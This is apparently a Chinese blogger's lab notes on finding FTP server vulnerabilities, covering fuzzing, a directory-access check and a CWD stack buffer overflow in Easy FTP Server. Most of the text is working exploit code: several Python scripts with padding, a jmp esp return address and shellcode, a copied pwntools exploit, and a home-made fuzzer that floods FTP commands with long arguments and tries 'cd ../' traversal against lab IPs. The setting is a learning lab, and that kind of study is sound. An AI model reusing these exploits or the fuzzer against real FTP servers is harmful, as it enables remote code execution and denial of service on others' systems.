FTP的漏洞挖掘
FTP协议简介
漏洞挖掘手记1:DOS
原理是对FTP协议中的命令及命令参数进行脏数据替换,构造畸形FTP命令并发送给被测试FTP服务程序。
下了一个FTPFuzz,界面丑绝人寰
开启Quick ‘n Easy FTP Server
开启后,做实验并没有崩溃,不能触发DOS攻击。可能和SP3有关
漏洞挖掘手记2:访问权限
在WIN7中开启CompleteFTP Server
登陆不了,新建个账户吧
FTP 目录在本地系统中的“/Home/user”
所以这这就绕过了?
easyFTP 缓冲区溢出漏洞
Easy FTP Server执行CWD时未对参数进行长度有效性校验,传递超长参数会造成缓冲区溢出.
启动easyFTP,开启后生成三个XML配置文件和一个文件夹
挂连上OD,按F9继续运行
实验失败:
代码如下:
import socket import sys def ftp_test(ip,port): target = ip port = port shellcode = ('\x50\x20' '\xD9\xEE' '\xD9\x74\x24\xF4' '\x58' '\x83\xC0\x1b' '\x33\xC9' '\x8A\x1C\x08' '\x80\xF3\x11' '\x88\x1C\x08' '\x41' '\x80\xFB\x90' '\x75\xF1' '\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d' '\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42' '\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a' '\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84' '\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48' '\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b' '\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64' '\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12' '\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca' '\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41' '\x42\xee\x46\xed\x42\xee\x46\xe9\x81') buffer = shellcode+'a'*(268-198)+'\xa0\x6f\x5f\x7d' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target,port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) s.recv(1024) s.send('USER anonymouss\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) print "[+] Sending buffer..." s.send('CWD' + buffer + '\r\n') try: s.recv(1024) print "failed" except: print "ok" s.close() if __name__ == '__main__': ftp_test("192.168.211.129", 21)
转去网上搜索别人的代码,他人代码用到的是 pwntools 包,在windows上安装不了,我笑了。呵呵哒。此处贴上他人利用的代码
from pwn import * p = remote("192.168.253.156", 21) jmp_esp = 0x7E429353 shellcode = "\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0" nop = "\x90" * 12 payload = 'a' * 268 + p32(jmp_esp) + nop + shellcode print p.recv(1024) p.sendline("USER anonymous") print p.recv(1024) p.sendline("PASS anonymous") print p.recv(1024) p.sendline("CWD " + payload) p.interactive()
继续接着做实验 ,成功,排查原因:代码少写一个空格。所以此处提醒大家,注意细节。
执行CWD命令后发生缓冲区溢出,直接找CWD命令,使用OD查找ws2_32.Rev,但是怎么找呢?使用IDA(不会用啊,感觉又得恶补一下了)每天问别人,今天先把攻击的代码写了
此处暂停
此处修改为jmp esi
中文版xp用不了
贴上最终代码
import socket import sys import time def ftp_test(ip,port): target = ip port = port jmp_esp = 0x7E429353 shellcode = "\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0" nop = "\x90" * 12 buffer = 'a' * 268 + '\x53\x93\x52\x7E' + nop + shellcode s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target,port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) time.sleep(1) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) print "[+] Sending buffer..." s.send('CWD ' + buffer + '\r\n') try: h = s.recv(1024) print h print "failed" except: print "ok" s.close() if __name__ == '__main__': ftp_test("192.168.211.129", 21)
Fuzz DIY
# -*- coding: utf-8 -*- # @Date : 2017-02-19 21:44:12 # @Author : giantbranch (giantbranch@gmail.com) # @Link : http://blog.csdn.net/u012763794?viewmode=contents # @Link : http://www.giantbranch.cn/ import sys import socket buffer = 'a' * 4 fuzzcmd = ['mdelete', 'cd', 'mkdir', 'delete', 'cwd', 'mdir', 'mput', 'mls', 'rename', 'site index' ] if len(sys.argv) != 4: print "[*] Please input like this: python fuzzFtp.py 192.168.253.151 21 1" sys.exit(0) target = sys.argv[1] port = int(sys.argv[2]) mode = int(sys.argv[3]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print target print port con = s.connect((target, port)) print "[*] Connected!" except: print "[*] Connect failed!" sys.exit(0) # 接受欢迎信息 s.recv(1024) s.send("USER anonymous\r\n") s.recv(1024) s.send("PASS anonymous\r\n") s.recv(1024) j = 100 if mode ==1: print "[*] Sending payload..." for i in fuzzcmd: s.send(i + ' ' + buffer*j + '\r\n') s.send(i + ' ' + buffer*j*4 + '\r\n') s.send(i + ' ' + buffer*j*8 + '\r\n') s.send(i + ' ' + buffer*j*40 + '\r\n') s.send(i + ' ' + buffer + ' ' + buffer + '\r\n') try: s.recv(1024) print "[!] WuWu, Failed!" except : print "[+] Yeah! Maybe you find a Bug!" if mode == 2: s.send('cd ../\r\n') ds = s.recv(50).find("550") if ds != -1: print "[+] Yeah! Maybe you can cd ../!" if mode == 2: s.send('cd ..\\r\n') dss = s.recv(50).find("550") if dss != -1: print "[+] Yeah! Maybe you can cd ..\!"
运行完毕,服务端特别卡
未成功
